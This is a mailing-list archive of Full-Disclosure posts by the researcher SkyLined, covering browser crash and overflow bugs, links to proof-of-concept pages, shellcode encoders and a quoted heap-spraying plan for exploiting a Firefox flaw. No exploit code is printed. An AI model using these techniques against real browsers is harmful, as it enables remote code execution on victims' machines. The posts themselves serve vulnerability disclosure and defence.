http://skypher.com/SkyLined/Repro/FireFox/FireFox%203.0.1%20(Build%202008070208)%20av-read...@xul!jvm_maybeshutdownliveconnect+0xdbe0/repro.html


Berend-Jan Wever  http://skypher.com



On Wed, Jan 7, 2009 at 6:04 PM, Berend-Jan Wever
wrote:

> This bug was reported by me to Mozilla in September. It is DoS 
> only.<https://bugzilla.mozilla.org/show_bug.cgi?id=456727>
> https://bugzilla.mozilla.org/show_bug.cgi?id=456727
>
>
> https://bugzilla.mozilla.org/skypher.com/SkyLined/Repro/FireFox/FireFox%203.0.1%20(Build%202008070208)%20av-read%5b0...@xul!jvm_maybeshutdownliveconnect+0xdbe0/repro.html
>
>
> How about giving some credit where it's due?
>
> Cheers,
> SkyLined
>
>
> ------------
> Berend-Jan Wever  http://skypher.com
>
>
>
>
> On Wed, Jan 7, 2009 at 4:53 PM, carl hardwick wrote:
>
>> An unpatched security flaw has been discovered in the latest version
>> of Firefox 3.0.5 which allows a remote attacker to crash the browser
>> with a special crafted HTML page using a queryCommandState:
>>
>> PoC:
>> http://groups.google.it/group/carl-hardwick/web/Firefox305RemoteDoS.htm
>>

Re: [Full-disclosure] Firefox 3.0.5 remote vulnerability via queryCommandState

2009-01-07 Thread Berend-Jan Wever
This bug was reported by me to Mozilla in September. It is DoS
only.<https://bugzilla.mozilla.org/show_bug.cgi?id=456727>
https://bugzilla.mozilla.org/show_bug.cgi?id=456727

https://bugzilla.mozilla.org/skypher.com/SkyLined/Repro/FireFox/FireFox%203.0.1%20(Build%202008070208)%20av-read%5b0...@xul!jvm_maybeshutdownliveconnect+0xdbe0/repro.html


How about giving some credit where it's due?

Cheers,
SkyLined

--------
Berend-Jan Wever  http://skypher.com



On Wed, Jan 7, 2009 at 4:53 PM, carl hardwick wrote:

> An unpatched security flaw has been discovered in the latest version
> of Firefox 3.0.5 which allows a remote attacker to crash the browser
> with a special crafted HTML page using a queryCommandState:
>
> PoC:
> http://groups.google.it/group/carl-hardwick/web/Firefox305RemoteDoS.htm
>

[Full-disclosure] MSIE screen[""] NULL ptr Read AV DoS details

2009-01-07 Thread Berend-Jan Wever
NULL ptr Read AV DoS affecting MSIE 6.0, 7.0 and 8.0 (beta). Reported to MS;
should be fixed in 8.0 rc1.

http://skypher.com/index.php/2009/01/07/msie-screen-null-ptr-dos-details/
No script kiddies, you cannot download and execute with this one. Why don't
you give your money to charity rather than offer it to me to write you an
exploit? Then again, I do find your emails amusing...

Cheers,

SkyLined



Berend-Jan Wever  http://skypher.com

[Full-disclosure] CVE-2008-2303 proof of concept and more

2009-01-05 Thread Berend-Jan Wever
CVE-2008-2303 covers an integer overflow in the handling of indices in
the "arguments" array in Apple Safari that affects iPhone, iPod and PC
(Mac and Windows). It was fixed in Safari 3.2 for iPhone and iPod in
July and for PC in November. More details here:
http://support.apple.com/kb/HT3298


Simple repro:
http://skypher.com/SkyLined/Repro/Safari/arguments%5B0x8%5D/repro.html


I have also created proof of concept code that shows potential
exploitability and demonstrates how to use heap-spraying in Safari.
AFAIK this is the first use of heap spraying in Safari, but I may be
wrong. Heap spraying in Safari is not that different from other
browsers, just backwards ;)

http://skypher.com/SkyLined/Repro/Safari/arguments%5B0x8%5D/poc.html

No, script-kiddies, it is not a working "insert download and execute
code here" exploit - view source for the win!!


I have created a list of software vulnerabilities, including
previously unreleased material, on my website:

http://skypher.com/wiki/index.php?title=List_of_software_vulnerabilities


Cheers,


SkyLined


------------
Berend-Jan Wever  http://skypher.com

[Full-disclosure] List of security teams contact information

2008-12-17 Thread Berend-Jan Wever
Hey all,

I've created a list with contact information for various security teams:

http://skypher.com/wiki/index.php?title=List_of_security_teams_contact_information
I hope this makes informing vendors about security issues easier. If you
have any additional information or spot an error, let me know.

Cheers,

SkyLined


Berend-Jan Wever  http://skypher.com

[Full-disclosure] StumbleUpon XSS (fixed)

2008-08-12 Thread Berend-Jan Wever
Hi all,

I found an XSS issue in StumbleUpon, which has been fixed. If you're
interested in what the problem was, look here: http://skypher.com/

What I found most interesting about this case is that there were only 40
minutes between the acknowledgement of receipt of my email about the issue
and their fix being online. In my experience that is really, really fast!

Cheers,

SkyLined


Berend-Jan Wever <[EMAIL PROTECTED]> http://skypher.com

[Full-disclosure] ASCII Art shellcode

2008-08-04 Thread Berend-Jan Wever
Hi all,

I've put some more stuff online I created in the last two years; ASCII Art
shellcode:
 http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Organic
 http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Blocky
 http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Julia

As the name suggests, it is working shellcode that's also ASCII Art. They
all use the same basic principle: a small decoder embedded into the first
characters of the ASCII Art. After the decoder, the original shellcode is
encoded into the remainder of the ASCII Art. When executed, the decoder
decodes the original shellcode and runs it, similar to how my ALPHA2
alphanumeric shellcode works.

If you are going to release an exploit, you might as well make it look good.

Cheers,

SkyLined


--------
Berend-Jan Wever <[EMAIL PROTECTED]> http://skypher.com

[Full-disclosure] Alphanumeric shellcode improvements

2008-07-01 Thread Berend-Jan Wever
Hi all,

I've not had as much opportunity in the last three years to contribute, but
I do have some new stuff: I've decided to pre-release some parts of ALPHA3,
the upcoming new version of my alphanumeric shellcode encoder:
* I've reduced the size of the mixedcase ascii decoder:
http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86
* I've created a lowercase ascii decoder:
http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86
* I've created a mixedcase ascii decoder for x64:
http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64
See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and
some documentation.

Cheers,
SkyLined

-- 
Berend-Jan "SkyLined" Wever
Email & Live messenger: [EMAIL PROTECTED]
--
'The historical abuses of new data occurred between the time that a few
people learned the important thing and the time when that important thing
became general knowledge. To the Gowachin and to BuSab it was the "Data
Gap," a source of constant danger.'
-- Frank Herbert, 'The Dosadi Experiment'

[Full-disclosure] First cross-domain XSS worm (not)

2007-07-16 Thread Berend-Jan Wever

Hi all,

I recently stumbled upon this;
http://ha.ckers.org/blog/20070709/nduja-cross-domainwebmail-xss-worm/
In short: It mentions a "new" kind of XSS worm; one that can infect multiple
domains. I attempted to reply but my reply mysteriously never made it to the
page. In an attempt to set the record straight on XSS worms, I'll post my
reply here:

(Cross-domain) XSS worms are much older than Samy or Nduja:
http://archive.cert.uni-stuttgart.de/bugtraq/2002/10/msg00122.html
It's been 5 years, I can see how you forgot about it. Samy and Nduja can
claim the prize for the first _publicly_released_ XSS worms, but they are
definitely not the first of their kind. Also, it is a misconception to think
that worms can only exist because of Ajax; a worm can just as easily spread
without XMLHTTPRequest. I've been told that people saw XSS worms as early as
2000, but I have found no evidence to support this: let me know if you know
something.

Cheers,
SkyLined

--
Berend-Jan "SkyLined" Wever <[EMAIL PROTECTED]>

[Full-disclosure] SMC Networks Inc security contact anyone?

2006-07-29 Thread Berend-Jan Wever
Hi all,
 
I'm looking for a way to contact SMC (www.smc.com) security people about a few vulnerabilities in their routers. Both [EMAIL PROTECTED] and 
[EMAIL PROTECTED] failed.
 
Cheers,
SkyLined
-- 
Berend-Jan Wever <[EMAIL PROTECTED]>
http://spaces.msn.com/members/berendjanwever/
 

[Full-disclosure] FireFox exploit updated

2005-09-22 Thread Berend-Jan Wever
http://www.milw0rm.com

Somewhere I totally forgot to credit Tom Ferris for finding the
vulnerability. I hate it when people forget credits and now I am one
of them :(.

Please update your copy if you have mirrored it on your site.

Cheers,
SkyLined

--
Berend-Jan Wever <[EMAIL PROTECTED]>
http://www.edup.tudelft.nl/~bjwever


[Full-disclosure] Internet Exploiter meets FireFox

2005-09-22 Thread Berend-Jan Wever
Hi all,
 
Since I stopped releasing browser exploits, development on them seems to have slowed to a halt. For the latest FireFox vulnerability, I decided to finally port Internet Exploiter and thus PwnZilla was born.
 
Technical details and documentation are all inline.
 
FireFox 1.0.7 is out, which seems to patch the vulnerability. I could find no release information on the website so far, but that may change in the near future.
 
Get the exploit at http://www.milw0rm.com.
 
Cheers,
SkyLined
 
PS. Does anybody ever talk to Dave Ahmad? All my posts from gmail seem to bounce off securityfocus for this reason:
  <[EMAIL PROTECTED]>:  ezmlm-reject: fatal: Sorry, I don't accept messages of MIME Content-Type 'multipart/alternative' (#5.2.3)

I'm wondering if it's just me or everybody that uses gmail?
-- 
Berend-Jan Wever <[EMAIL PROTECTED]>
http://www.edup.tudelft.nl/~bjwever

Re: [Full-disclosure] Google Secure Access or "How to have peopledownload a trojan."

2005-09-22 Thread Berend-Jan Wever
Hi,
Maybe the frivolous way in which I addressed this problem led people to believe I am not to be taken seriously. I would suggest you do not judge the book by its cover. Allow me to explain my point of view in more detail:

 
1. You are not securing your information, you are putting all your eggs in one basket.

2. I am not disputing the _reasons_ they may have to gather information or _what_ information they gather, I am merely pointing out that the problem is the _fact_ that they do so.

 
Google Secure Access misleads their users by implying that _no-one_ will get to see anything of what you send to and receive from the Internet if you use their service. But if you read their privacy policy, you will find out that they are tracking this information themselves.

 
A good deal of the services offered by Google are provided so Google can track how you use them. This is an exchange of services, you supply Google with your usage data and Google supplies you with whatever service you request. You may not pay for these services with money, but you do pay for them with information. Google uses this information to make money. I assumed this was common knowledge.

Google may do whatever they see fit with this information within the boundaries of the law. The law binds Google to uphold the privacy policy. The privacy policy allows Google 
to do whatever they want if they so see fit by thinking up a good reason to do so. I am not saying they will, I am saying they can.
 
Mr Boily:
I did selectively quote parts of the privacy policy; I only quoted those parts that were relevant to my argument. Again, my argument is about the _fact_ that they collect 
data, not _what_ they collect nor the _reasons_ they may have for doing so. I also supplied the link to the policy so anyone can read the full version.

 
We seem to use a different definition of spyware. This has happened before on this list. If you Google the definition, you will find everybody has their own. 
In my previous email and this I am using these definitions:
"spyware" - Any software program that monitors a person's actions without his or her knowledge
"trojan" - Any software program that presents itself to its users as something useful but, unknown to its user, also performs another action for its creators. 
If you agree to these definitions, you must see that Google Secure Access is both a trojan and spyware.
 
Cheers,
SkyLined
-- 
Berend-Jan Wever <[EMAIL PROTECTED]>
http://www.edup.tudelft.nl/~bjwever

[Full-disclosure] Google Secure Access or "How to have people download a trojan."

2005-09-21 Thread Berend-Jan Wever
This is a quite pathetic attempt to install a trojan, let me explain:
 
http://wifi.google.com/faq.html

"Google Secure Access is a downloadable client application that allows users to establish a more secure WiFi connection."
"...your internet traffic will be encrypted, preventing others from viewing the information you transmit."
 
So, by "more secure" Google means using encryption to prevent "others" from sniffing your packets. That's nice! What else does it do? Here's some information from the
privacy policy:
http://wifi.google.com/privacy-policy.html

"Google may log some information from your web page requests ..."
"Google also logs a small set of non-personally identifiable information ..."
"Google will not sell or provide personally identifiable information to any third parties except ..."
"... we may for a limited period of time preserve additional internet traffic or other information."

 
Aha! What we have here is trojan spyware! It does exactly what it is supposed to protect you from.
 
The second snippet clearly states that this concerns NON-personally identifiable information... what about the information mentioned in the first snippet, is that personally identifiable? I guess so; the third snippet mentions Google selling or providing personally identifiable information, this must have come from somewhere!
 
In the third snippet, Google neglects to mention non-personally identifiable information. What about selling that? I guess they do!
 
The best thing about the whole policy is the last snippet, which undoes _everything_ stated before it. Nice one Google!! ;)
 
I suggest that Google comes clean and replaces their privacy policy with a shorter, less confusing version:

Here's some candy, go play!
Btw. All your base are belong to us.
 
Cheers,
SkyLined
 
-- 
Berend-Jan Wever <[EMAIL PROTECTED]>
http://www.edup.tudelft.nl/~bjwever


[Full-disclosure] Shazara security contact?

2005-09-18 Thread Berend-Jan Wever
Sorry for the noise, no useful info in here.
 
Does anybody know a security contact for Shazara? They have forums and such, but you need to register, which I hate. I want to contact them through email anyway.
 
Cheers,
SkyLined
-- 
Berend-Jan Wever <[EMAIL PROTECTED]>
http://www.edup.tudelft.nl/~bjwever

[Full-disclosure] FireFox "Host:" Buffer Overflow is not just exploitable on FireFox

2005-09-11 Thread Berend-Jan Wever
Hi all,
 
Research and development has led to a ~90% reliable working exploit for the IDN Heap Buffer overrun in FireFox on WinXP and Win2k3 as long as DEP is turned off and JavaScript is enabled. Some tweaking might yield an even higher success ratio. It has also revealed that not only FireFox is vulnerable to this vulnerability, but the exact same exploit works on the latest releases of all these products based on the Mozilla engine:

 
- Mozilla FireFox 1.0.6 and 1.5beta,
- Mozilla Browser 1.7.11,

- Netscape 8.0.3.3.
 
Recommendations for this vulnerability:
- FireFox and Mozilla: Install the workaround for (https://addons.mozilla.org/messages/307259.html).
- Netscape: hope they'll respond to this email and release a workaround.

- Wait for a patch and install it asap.
 
Recommendations to make it harder to exploit any FireFox vulnerability:
- Turn on DEP (Data Execution Prevention),
- Turn off JavaScript,
- Switch to another browser,
- Do not browse untrusted sites,
- Do not browse the web at all,
- Unplug your machine from the web,
- Wear a tinfoil hat.
 
Cheers,
SkyLined 
On 9/10/05, Berend-Jan Wever <[EMAIL PROTECTED]> wrote: 

(Just a little heads up, no details or PoC attached)
 
The security vulnerability in Mozilla FireFox reported by Tom Ferris is exploitable on Windows.
I developed a working exploit that seems to be 100% stable, though I've only tested it on one system.
The exploit will not be released publicly until patches are out.
 
On a side note: it took only about 3 hours and 30 minutes to develop the exploit, so I might not be the only one able to write it.
 
Cheers,
SkyLined
-- 
Berend-Jan Wever <[EMAIL PROTECTED]>
http://www.edup.tudelft.nl/~bjwever

[Full-disclosure] Mozilla Firefox "Host:" Buffer Overflow Exploit

2005-09-10 Thread Berend-Jan Wever
(Just a little heads up, no details or PoC attached)
 
The security vulnerability in Mozilla FireFox reported by Tom Ferris is exploitable on Windows.
I developed a working exploit that seems to be 100% stable, though I've only tested it on one system.
The exploit will not be released publicly until patches are out.
 
On a side note: it took only about 3 hours and 30 minutes to develop the exploit, so I might not be the only one able to write it.
 
Cheers,
SkyLined
-- 
Berend-Jan Wever <[EMAIL PROTECTED]>
http://www.edup.tudelft.nl/~bjwever
 

[Full-disclosure] COM objects and MSIE vulnerabilities recap + additional fix

2005-08-18 Thread Berend-Jan Wever
Disclaimer:
    The information in this email is distributed WITHOUT ANY WARRANTY, TO THE
    EXTENT PERMITTED BY APPLICABLE LAW; without even the implied warranty of
    CORRECTNESS or FITNESS FOR A PARTICULAR PURPOSE. You know the drill...

Affected products:
    Various COM objects when loaded in Microsoft Internet Explorer.

Extent:
    DoS and remote arbitrary code execution.

Patches:
    MS05-037 and MS05-38. See below for additional killbit.

Exploits:
    Internet Exploiter 4 will not be released to the public in the near future.
    Public exploits based on Internet Exploiter have been written by third
    parties for a number of affected objects. They are available on the net
    from various sources.

Short description:
    A number of issues have been reported lately by various sources about
    Internet Explorer vulnerabilities in relation to specific COM objects.
    Research has shown that the root cause is the fact that these COM objects
    are not designed to be loaded in IE at all. These objects therefore make
    wrongful assumptions about the state of the process they are loaded into,
    specifically about the contents of heap memory. This can be abused to
    uncover unwanted features, like the ability to run arbitrary code on a
    victim's machine.

Short History:
    On June 24th 2002 'ken'@FTU reported a NULL-pointer exception in IE when
    loading a specific COM object. The object was mmsys.cpl which uses
    clsid:{00022613---C000-0046}. The issue was discarded as a low impact DoS.
    On April 18th 2005, further research revealed that this was in fact a
    problem with the COM object reusing previously freed memory without
    initialising it. Part of the reused memory was used as a function pointer.
    Careful allocating and freeing of memory prior to loading the object
    allowed remote code execution on Win2K. Internet Exploiter 4 was born.
    (This vulnerability does NOT seem to be exploitable on WinXPSP2, as claimed
    by FrSIRT in their MS05-038 exploit)
    On June 17th 2005, Bernhard Müller and Martin Eiszner found a similar issue
    when loading javaprxy.dll and released their information to the public.
    On July 2nd, August 9th and August 17th 2005, FrSIRT released shamelessly
    ripped code that claims to exploit a number of these objects. While failing
    to work on most occasions through lack of finesse, it does prove that even
    script-kiddies can easily write exploits by copy-pasting my Internet
    Exploiter heap spraying code. It takes so little effort that it might
    actually cost you more time to add proper credits to the original author
    of the code.

Solution:
    I've been working with the Internet Explorer team on short term and long
    term solutions. The latest patch (MS05-038) will "killbit" a number of
    objects that were found to have issues when loaded in IE. These killbits
    prevent exploits from loading these objects and abusing this vulnerability.

    The latest exploit by FrSIRT targets "msdss.dll" with clsid
    EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F, which is not killbitted by ms05-038.
    I was unable to reproduce the vulnerability with version 7.10.3077.0 of the
    dll; the object doesn't even crash. From what I've heard everybody else
    seems to be unaffected too, so maybe it's just a local .fr thing.
    Just in case, here's a .reg file you can use to killbit this control;
    Create a new .txt file, copy+paste this into it, rename it to .reg, double
    click it and say "yes, I want to add it to the registry."
    !!! Lines may wrap, you might have to remove the extra line-breaks !!!

--- cut here ---
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}]
"Compatibility Flags"=dword:0400
--- cut here ---

    If you want to test if it works, here's a .html file that will show you;
    Create a new .txt file, copy+paste this into it, rename it to .html, double
    click and it will tell you if you are safe (the object cannot be loaded)
    or if you might be vulnerable to this attack (the object can be loaded):

--- cut here ---
    Vulnerable...');"
    should be safe!');"
    classid=""
--- cut here ---

Greets:
    [EMAIL PROTECTED], [EMAIL PROTECTED], 0dd, 0x4553, l33tsecurity, NGS.

Anti-Greets:
    FrSIRT (I thought I was special, turns out they rip-off everybody's code!)

Cheers,
SkyLined

[Full-disclosure] Re: Mozilla Firefox InstallVersion->compareTo() vulnerability lowered severity status

2005-08-04 Thread Berend-Jan Wever

In short: Setting up complicated structures and knowing where they are should be rather trivial and if what you claim is true, this could be exploitable with a high degree of success.
 
Details: It would be pretty easy to implement setting up three kinds of heap blocks; instead of running the heap block creation once, you run it three times to create three different kinds of information in three different locations. You can predict where the blocks will roughly be located since they're so large. In IE, large heap blocks (>= 0x0040 bytes IIRC) will always be allocated at an address ending with , making exact placement of structures up to 0x1 bytes big trivial. Assuming FF uses the same heap manager, you can setup complicated structures at known locations. Assuming what Aviv Raff is claiming about the vulnerability, this sounds exploitable with a high degree of success.

 
Cheers,
SkyLined
 
On 8/4/05, Aviv Raff <[EMAIL PROTECTED]> wrote:

Hi,
After more than 2 weeks of no response from the Mozilla Foundation (
 https://bugzilla.mozilla.org/show_bug.cgi?id=295854), I've decided to disclose the following information:
Version 1.0.5 of Firefox has fixed a vulnerability in the InstallVersion->compareTo() function that could potentially allow remote code execution. 
The Mozilla team have decided to set the severity status of the vulnerability to 'Moderate', instead of a higher severity status, claiming an exploitation of this vulnerability requires a predictable address, which means it's almost impossible to exploit. 
This is partly true. A script can be easily built to significantly increase the possibility of a successful exploitation.
An attacker can use Skylined's Heap spraying method (used in "Internet Exploiter" - 
http://www.edup.tudelft.nl/~bjwever/advisory_msie_R6025.html.php), to fill the heap with fake data and vtbl structures that will point to the exploit code.
This can be done by spraying 3 heap blocks - "data" block, "vtbl" block and "exploit" block - instead of one, as was presented by Skylined. The "data" block will point to a "vtbl" location which will be exactly the eax address + the heap block size. The data in the "vtbl" block will point to the "exploit" block which will be exactly the pointed "vtbl" address + the heap block size. The "exploit" block, of-course, will have the exploit code, padded with nops. 
This will boost the possibility that the eax address, specified by the attacker, will fall into the faked "data" block. Other methods can be applied to increase the risk even more. 
Therefore, my suggestion to the Mozilla Foundation is to raise the severity status of the vulnerability to 'High' or 'Critical'. 
Best regards,
Aviv Raff.

-- 
Berend-Jan Wever <[EMAIL PROTECTED]>
http://www.edup.tudelft.nl/~bjwever
 

[Full-disclosure] Re: alpha numeric exploitation

2005-05-30 Thread Berend-Jan Wever
> I'm trying to develop an alphanumeric payload that needs to do a JMP -600 bytes... 
ALPHA2 encodes shellcode to alphanumeric, unicode alphanumeric, uppercase alphanumeric and uppercase unicode alphanumeric.
http://www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php
You can download the source and compile it or use the online version.
 
> Beyond that, I'd be extremely surprised if someone hasn't written
> tutorials on doing alphanumeric-only payloads,
Writing ia32 alphanumeric shellcodes by rix:
http://www.phrack.org/show.php?p=57&a=15
Building IA32 'Unicode-Proof' Shellcodes by obscou:
http://www.phrack.org/show.php?p=61&a=11
Writing IA32 Restricted Instruction Set Shellcode Decoder Loops by SkyLined
http://www.edup.tudelft.nl/~bjwever/whitepaper_shellcode.html.php
> if not even provided toolkits to take arbitrary code and "ASCII-fy" it. 
See ALPHA2.
 
> Would dissembler do what you want? It should be able to squeeze the
> ascii shellcode for you ;-)
Nice tool ;) But printable characters are not all alphanumeric characters.
 
Cheers,
SkyLined
-- 
Berend-Jan Wever <[EMAIL PROTECTED]>
http://www.edup.tudelft.nl/~bjwever

Re: [Full-disclosure] #HACKPHREAK ADVISORY | BBQ CHICKEN WTF!

2005-04-13 Thread Berend-Jan Wever
I propose we up the age limit to post on full-disclosure to 14.

Cheers,
SkyLined


[Full-disclosure] Details and PoC for MS05-020 MSIE DHTML Object handling vulnerabilities

2005-04-12 Thread Berend-Jan Wever
Details and PoC code for MSIE DHTML Object handling vulnerabilities are 
available online at my website:
http://www.edup.tudelft.nl/~bjwever
Note: page is not up-to-date, since it was written in August/September 2004. 
Additional information will be added when found during testing of MS05-20 patch.

Cheers,
SkyLined

PS. I was pretty surprised nobody asked me why I went from Internet Exploiter 1 
to Internet Exploiter 3 so now you know.

.---,
   / Berend-Jan Wever aka SkyLined   )
  / [EMAIL PROTECTED]/ \
 / http://www.edup.tudelft.nl/~bjwever /  /
/ PGP key ID 0x48479882   /  /
   / .., /  /
  / (  '  /   /  . __   __/ /  /
 /   `'-._   /.' | / /  / ( / /_.'.' / /  /
( ) / )  |/ /  / / ) (__ (__/ /  /
 \---' --` '-<  /
  \__.`\__\/\_\/


The information contained in this e-mail, if any, is often incorrect and
probably plagiarized. It is intended solely for the amusement of the addressee.
If you are not the intended recipient, my bad. Any action taken or omitted to
be taken in reliance on the information in this message is your problem. Please
notify me immediately if you have received it in error by reply e-mail and then
delete this message from your system and any files in its vicinity.

I endeavour to ensure that my emails and any attachments are free from viruses,
content, value or other contaminants. However, I cannot accept any
responsibility might something worthwhile accidentally slip in. I therefore
recommend you do not read them at all just to be sure.

Please note that the statements and views expressed in this email and any
attachments are completely chosen at random by the author and do not
necessarily represent anything coherent, relevant or useful.